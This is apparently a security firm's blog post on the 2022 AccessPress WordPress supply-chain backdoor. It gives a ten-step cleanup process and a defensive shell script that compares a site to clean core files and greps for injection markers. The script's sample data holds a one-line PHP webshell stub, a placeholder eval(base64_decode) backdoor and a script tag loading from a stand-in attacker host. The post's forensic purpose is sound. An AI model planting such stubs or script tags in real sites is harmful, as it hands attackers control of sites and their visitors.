Our Malware Removal process and the latest WordPress Vulnerability Found by JetPack
A malware removal process is tedious and time-consuming, and over 360,000 websites may need to start one soon. On January 18th, 2022, JetPack’s security team disclosed a supply-chain compromise that gives attackers full control of an affected website; the compromise itself was discovered the previous September. The affected products are the themes and plugins made by AccessPress. While investigating a compromised site, the team noticed that the malicious code was present in every plugin and theme from this WordPress creator, but only in copies downloaded directly from the AccessPress site.
The same themes and plugins downloaded from the WordPress.org repository were not infected. This led them to conclude that the AccessPress site itself had been compromised and that the attackers had injected their code into every theme and plugin distributed from it. Once an infected theme or plugin is installed, the malicious code creates a backdoor that gives the attackers full access to the site.
JetPack’s team only investigated the freely distributed themes and drew no conclusion about the paid premium themes. If you have a paid AccessPress theme, check with their support team to find out whether you are affected.
Most of the affected plugins have since been patched and cleaned up, but the themes have not. If you use one of their themes, get help moving your site to a different theme or clean it up immediately. Replacing the theme or updating the plugin is not enough on its own: the hack also infected WordPress core files, so the steps below are still needed.
Our 10 steps to malware removal
We use a thorough clean-up process. Here are the steps we take to make sure every infected file is removed.
1- Zip and Download – Gather all of your website’s files, compress them into a zip archive and download it to your local computer. Many users want to replace files in place on the web host, but that only creates a never-ending cycle: files you have not yet cleaned can re-infect the ones you just replaced, and visitors get a broken site while you work.
2- Maintenance Page – Once the files are zipped and downloaded, remove them from the web host so that visitors do not see a broken site while the hack is being cleaned. Put up an ‘Under Maintenance’ page so that visitors are not alarmed.
3- Replacing Core files – For a WordPress hack, download a fresh copy of WordPress of the same version the infected site runs. Delete the wp-includes and wp-admin folders and all WordPress files in the site root, and replace them with the copies from the fresh download. Do not delete the wp-content folder or the wp-config.php file.
4- Manually verify foreign files – Any file in the site root that is not part of the default WordPress structure should be inspected by hand; attackers like to give their files names beginning with “wp-” so that they blend in. If you decide a file does not belong to the site, remove it. Since wp-config.php is kept, read through it as well and check that nothing has been injected into it.
5- Replace themes and plugins – After the core files, replace every theme and plugin. Download them from the WordPress.org repository whenever possible; for premium ones, make sure the copy downloaded from the vendor is clean by scanning the zip file with VirusTotal. In the AccessPress case the vendor’s own site was the source of the infection, which is exactly why the repository copy is preferred. Where the developers have not cleaned up their themes or plugins, a manual scan to remove malicious code and files is necessary. This is often the most time-consuming part of the process.
6- Scan the database – The database is often infected as well. Export a copy of the database and scan the dump for injected code. This too is a manual process: search for the most common injections (base64-encoded payloads, eval calls, script tags injected into posts and options) and remove them. We use various open source tools, such as SonarQube.
7- Scan and double check – Before relaunching the site, run a full scan of the local copy. Tools such as the WPScan command-line tool and SonarQube can help; note that WPScan probes a running site over HTTP, so point it at a local staging copy or at the site once it is back up. If nothing is found, the site is safe to launch. If infected files are still found, repeat the process starting with the replacement of the core files.
8- Launching the site – Zip the freshly scanned files, upload them to the web host, remove the ‘Under Maintenance’ page and unzip the clean files. Replace the database with the clean copy as well, even if it turned out not to be infected. Then open and inspect the entire site from a visitor’s perspective.
9- Securing your site – After a hack, you will want to tighten security. A plugin such as Wordfence or Sucuri lets you scan the site from within the WordPress backend. Reset the passwords of all users and enforce strong passwords, and rotate the authentication keys and salts in wp-config.php so that any session cookies the attackers still hold stop working.
10- Maintenance – Keeping plugins, themes and WordPress itself up to date, together with frequent scans, will help you avoid having to go through this malware removal process again. Most security plugins can run scans on a schedule and report anything suspicious.
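As an added example (not the author’s own tooling) of what steps 3, 4, 6 and 7 look like on the command line, the following POSIX shell script compares the downloaded site against a clean WordPress copy of the same version, reports core files that were modified and files that do not belong, and greps both the file tree and a database dump for the usual injection markers. The directory layout, the grep patterns and the sample data it builds are all constructed for the example; in the sample site one core file has a backdoor appended and a hypothetical dropped file named wp-cache-helper.php sits in the root.

```shell
#!/bin/sh
# Added example, not the author's tooling: compare a downloaded copy of a
# WordPress site against a clean reference copy of the same version, list the
# core files that were modified and the files that do not belong, then grep the
# site tree and a database dump for common injection markers.
# Assumptions: REF is an unpacked wordpress-<version>.zip, SITE is the unpacked
# site archive from step 1, and the SQL dump is a plain export of the database.

# Core files (wp-admin, wp-includes and the root-level files) whose content
# differs from the reference copy. wp-content is deliberately not compared.
changed_core_files() {
  ref=$1; tree=$2
  ( cd "$ref" || exit 1
    find wp-admin wp-includes -type f
    find . -maxdepth 1 -type f | sed 's|^\./||' ) | sort | while read -r f; do
    if [ -f "$tree/$f" ] && ! cmp -s "$ref/$f" "$tree/$f"; then
      printf '%s\n' "$f"
    fi
  done
}

# Files in wp-admin, wp-includes or the root that have no counterpart in the
# reference copy. wp-config.php is expected to be absent from the reference and
# is skipped here, but it still has to be read by hand for injected code.
foreign_files() {
  ref=$1; tree=$2
  ( cd "$tree" || exit 1
    find wp-admin wp-includes -type f
    find . -maxdepth 1 -type f | sed 's|^\./||' ) | sort | while read -r f; do
    case $f in wp-config.php) continue ;; esac
    [ -f "$ref/$f" ] || printf '%s\n' "$f"
  done
}

# Crude markers of the usual obfuscated droppers and injected script tags.
# Every hit still needs a manual look; this only narrows down where to look.
PATTERNS='eval\(base64_decode|eval\(gzinflate|eval\(str_rot13|assert\(\$|<script[^>]*src=.?https?://'
suspicious_hits() {
  grep -rnE -- "$PATTERNS" "$@"
}

# Constructed sample data (not a real site): a clean reference tree, a site
# tree with one modified core file and one dropped file, and a small SQL dump
# with an injected script tag. Prints the directory it created.
make_sample_trees() {
  root=$(mktemp -d)
  for d in "$root/clean" "$root/site"; do
    mkdir -p "$d/wp-admin" "$d/wp-includes" "$d/wp-content/plugins"
    printf '<?php // front controller\n' > "$d/index.php"
    printf '<?php // admin entry point\n' > "$d/wp-admin/admin.php"
    printf '<?php // core vars\n' > "$d/wp-includes/vars.php"
  done
  # site-specific but legitimate file, absent from the reference copy
  printf '<?php // site configuration\n' > "$root/site/wp-config.php"
  # backdoor appended to a core file (payload is a harmless placeholder)
  printf '<?php eval(base64_decode("ZWNobyAxOw=="));\n' >> "$root/site/wp-includes/vars.php"
  # hypothetical dropped webshell with a "wp-" name to blend in
  printf '<?php @assert($_POST["c"]);\n' > "$root/site/wp-cache-helper.php"
  printf 'INSERT INTO wp_options VALUES (1,"siteurl","https://example.com");\n' > "$root/dump.sql"
  printf 'INSERT INTO wp_posts VALUES (5,"<script src=http://evil.example/x.js></script>");\n' >> "$root/dump.sql"
  printf '%s\n' "$root"
}

# Demo run against the constructed data.
ROOT=$(make_sample_trees)
echo "== modified core files =="; changed_core_files "$ROOT/clean" "$ROOT/site"
echo "== foreign files =="; foreign_files "$ROOT/clean" "$ROOT/site"
echo "== suspicious content =="; suspicious_hits "$ROOT/site" "$ROOT/dump.sql"
rm -rf "$ROOT"
```

Against a real site, run the three functions with the unpacked clean WordPress download as the reference and the unpacked site archive as the tree; every file the first two functions list is one you replace or remove in steps 3 and 4, and every grep hit is a spot to open by hand in steps 6 and 7. The pattern list is intentionally short and will miss custom obfuscation, so it complements rather than replaces a full scanner.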
A CVE has been created for this issue if you are interested in more details.
For a list of all affected themes and plugins, and the versions you need to update to in order to remove this malware, check the WPScan entry for the CVE.
If you need help with any part of the malware removal process outlined above, or would like a security assessment of your site, feel free to contact us.